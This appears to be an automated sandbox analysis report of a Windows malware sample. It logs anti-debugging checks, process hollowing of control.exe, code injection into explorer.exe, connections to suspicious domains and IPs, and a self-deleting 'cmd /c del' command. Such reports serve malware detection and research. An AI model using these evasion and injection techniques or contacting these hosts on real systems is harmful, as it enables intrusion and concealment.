Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]	8_2_046D7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]	8_2_046D7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]	8_2_046D7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]	8_2_0472740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]	8_2_0472740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]	8_2_0472740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_047114FB mov eax, dword ptr fs:[00000030h]	8_2_047114FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]	8_2_046D6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]	8_2_046D6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]	8_2_046D6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728CD6 mov eax, dword ptr fs:[00000030h]	8_2_04728CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov ecx, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]	8_2_046EB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046990AF mov eax, dword ptr fs:[00000030h]	8_2_046990AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468F0BF mov ecx, dword ptr fs:[00000030h]	8_2_0468F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468F0BF mov eax, dword ptr fs:[00000030h]	8_2_0468F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468F0BF mov eax, dword ptr fs:[00000030h]	8_2_0468F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659080 mov eax, dword ptr fs:[00000030h]	8_2_04659080
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D3884 mov eax, dword ptr fs:[00000030h]	8_2_046D3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D3884 mov eax, dword ptr fs:[00000030h]	8_2_046D3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466849B mov eax, dword ptr fs:[00000030h]	8_2_0466849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465C962 mov eax, dword ptr fs:[00000030h]	8_2_0465C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467C577 mov eax, dword ptr fs:[00000030h]	8_2_0467C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467C577 mov eax, dword ptr fs:[00000030h]	8_2_0467C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465B171 mov eax, dword ptr fs:[00000030h]	8_2_0465B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465B171 mov eax, dword ptr fs:[00000030h]	8_2_0465B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467B944 mov eax, dword ptr fs:[00000030h]	8_2_0467B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467B944 mov eax, dword ptr fs:[00000030h]	8_2_0467B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04693D43 mov eax, dword ptr fs:[00000030h]	8_2_04693D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D3540 mov eax, dword ptr fs:[00000030h]	8_2_046D3540
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04677D50 mov eax, dword ptr fs:[00000030h]	8_2_04677D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728D34 mov eax, dword ptr fs:[00000030h]	8_2_04728D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120 mov ecx, dword ptr fs:[00000030h]	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468513A mov eax, dword ptr fs:[00000030h]	8_2_0468513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468513A mov eax, dword ptr fs:[00000030h]	8_2_0468513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]	8_2_04663D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]	8_2_04684D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]	8_2_04684D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]	8_2_04684D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465AD30 mov eax, dword ptr fs:[00000030h]	8_2_0465AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046DA537 mov eax, dword ptr fs:[00000030h]	8_2_046DA537
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]	8_2_04659100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]	8_2_04659100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]	8_2_04659100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04708DF1 mov eax, dword ptr fs:[00000030h]	8_2_04708DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0465B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0465B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0465B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046E41E8 mov eax, dword ptr fs:[00000030h]	8_2_046E41E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466D5E0 mov eax, dword ptr fs:[00000030h]	8_2_0466D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466D5E0 mov eax, dword ptr fs:[00000030h]	8_2_0466D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046861A0 mov eax, dword ptr fs:[00000030h]	8_2_046861A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046861A0 mov eax, dword ptr fs:[00000030h]	8_2_046861A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046835A1 mov eax, dword ptr fs:[00000030h]	8_2_046835A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]	8_2_04681DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]	8_2_04681DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]	8_2_04681DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467C182 mov eax, dword ptr fs:[00000030h]	8_2_0467C182
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A185 mov eax, dword ptr fs:[00000030h]	8_2_0468A185
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]	8_2_04652D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]	8_2_04652D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]	8_2_04652D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]	8_2_04652D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]	8_2_04652D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468FD9B mov eax, dword ptr fs:[00000030h]	8_2_0468FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468FD9B mov eax, dword ptr fs:[00000030h]	8_2_0468FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466766D mov eax, dword ptr fs:[00000030h]	8_2_0466766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0470B260 mov eax, dword ptr fs:[00000030h]	8_2_0470B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0470B260 mov eax, dword ptr fs:[00000030h]	8_2_0470B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728A62 mov eax, dword ptr fs:[00000030h]	8_2_04728A62
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469927A mov eax, dword ptr fs:[00000030h]	8_2_0469927A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]	8_2_0467AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]	8_2_0467AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]	8_2_0467AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]	8_2_0467AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]	8_2_0467AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]	8_2_04659240
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]	8_2_04659240
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]	8_2_04659240
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]	8_2_04659240
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]	8_2_04667E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046E4257 mov eax, dword ptr fs:[00000030h]	8_2_046E4257
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465E620 mov eax, dword ptr fs:[00000030h]	8_2_0465E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0470FE3F mov eax, dword ptr fs:[00000030h]	8_2_0470FE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]	8_2_0465C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]	8_2_0465C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]	8_2_0465C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04668A0A mov eax, dword ptr fs:[00000030h]	8_2_04668A0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A61C mov eax, dword ptr fs:[00000030h]	8_2_0468A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A61C mov eax, dword ptr fs:[00000030h]	8_2_0468A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04673A1C mov eax, dword ptr fs:[00000030h]	8_2_04673A1C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046676E2 mov eax, dword ptr fs:[00000030h]	8_2_046676E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046816E0 mov ecx, dword ptr fs:[00000030h]	8_2_046816E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728ED6 mov eax, dword ptr fs:[00000030h]	8_2_04728ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046836CC mov eax, dword ptr fs:[00000030h]	8_2_046836CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04698EC7 mov eax, dword ptr fs:[00000030h]	8_2_04698EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0470FEC0 mov eax, dword ptr fs:[00000030h]	8_2_0470FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]	8_2_046552A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]	8_2_046552A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]	8_2_046552A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]	8_2_046552A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]	8_2_046552A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D46A7 mov eax, dword ptr fs:[00000030h]	8_2_046D46A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466AAB0 mov eax, dword ptr fs:[00000030h]	8_2_0466AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466AAB0 mov eax, dword ptr fs:[00000030h]	8_2_0466AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]	8_2_04720EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]	8_2_04720EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]	8_2_04720EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468FAB0 mov eax, dword ptr fs:[00000030h]	8_2_0468FAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EFE87 mov eax, dword ptr fs:[00000030h]	8_2_046EFE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468D294 mov eax, dword ptr fs:[00000030h]	8_2_0468D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468D294 mov eax, dword ptr fs:[00000030h]	8_2_0468D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465DB60 mov ecx, dword ptr fs:[00000030h]	8_2_0465DB60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466FF60 mov eax, dword ptr fs:[00000030h]	8_2_0466FF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04683B7A mov eax, dword ptr fs:[00000030h]	8_2_04683B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04683B7A mov eax, dword ptr fs:[00000030h]	8_2_04683B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728F6A mov eax, dword ptr fs:[00000030h]	8_2_04728F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465DB40 mov eax, dword ptr fs:[00000030h]	8_2_0465DB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466EF40 mov eax, dword ptr fs:[00000030h]	8_2_0466EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04728B58 mov eax, dword ptr fs:[00000030h]	8_2_04728B58
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465F358 mov eax, dword ptr fs:[00000030h]	8_2_0465F358
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04654F2E mov eax, dword ptr fs:[00000030h]	8_2_04654F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04654F2E mov eax, dword ptr fs:[00000030h]	8_2_04654F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468E730 mov eax, dword ptr fs:[00000030h]	8_2_0468E730
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A70E mov eax, dword ptr fs:[00000030h]	8_2_0468A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A70E mov eax, dword ptr fs:[00000030h]	8_2_0468A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0471131B mov eax, dword ptr fs:[00000030h]	8_2_0471131B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467F716 mov eax, dword ptr fs:[00000030h]	8_2_0467F716
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EFF10 mov eax, dword ptr fs:[00000030h]	8_2_046EFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EFF10 mov eax, dword ptr fs:[00000030h]	8_2_046EFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0472070D mov eax, dword ptr fs:[00000030h]	8_2_0472070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0472070D mov eax, dword ptr fs:[00000030h]	8_2_0472070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046937F5 mov eax, dword ptr fs:[00000030h]	8_2_046937F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04725BA5 mov eax, dword ptr fs:[00000030h]	8_2_04725BA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04661B8F mov eax, dword ptr fs:[00000030h]	8_2_04661B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04661B8F mov eax, dword ptr fs:[00000030h]	8_2_04661B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0470D380 mov ecx, dword ptr fs:[00000030h]	8_2_0470D380
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04668794 mov eax, dword ptr fs:[00000030h]	8_2_04668794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468B390 mov eax, dword ptr fs:[00000030h]	8_2_0468B390
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]	8_2_046D7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]	8_2_046D7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]	8_2_046D7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0471138A mov eax, dword ptr fs:[00000030h]	8_2_0471138A

Source: C:\Users\user\Desktop\56460021473877.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe

Code function: 3_2_00409B40 LdrLoadDll,

3_2_00409B40

Source: C:\Users\user\Desktop\56460021473877.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.5.157.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.10.241.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eastsidescooters.com
Source: C:\Windows\explorer.exe	Network Connect: 67.205.83.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.celltecstore.com
Source: C:\Windows\explorer.exe	Domain query: www.thecrystalconsciousness.com
Source: C:\Windows\explorer.exe	Domain query: www.ps-sac.com
Source: C:\Windows\explorer.exe	Domain query: www.ville-fogalmam.com
Source: C:\Windows\explorer.exe	Domain query: www.box-770.com
Source: C:\Windows\explorer.exe	Domain query: www.txsports.club
Source: C:\Windows\explorer.exe	Domain query: www.rajinderbeas.com
Source: C:\Windows\explorer.exe	Network Connect: 31.170.167.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nhmingwei.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 148.72.177.185 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: 2F0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe

Memory written: C:\Users\user\Desktop\56460021473877.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3424			Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe	Process created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000000.735455957.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.739998516.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Users\user\Desktop\56460021473877.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
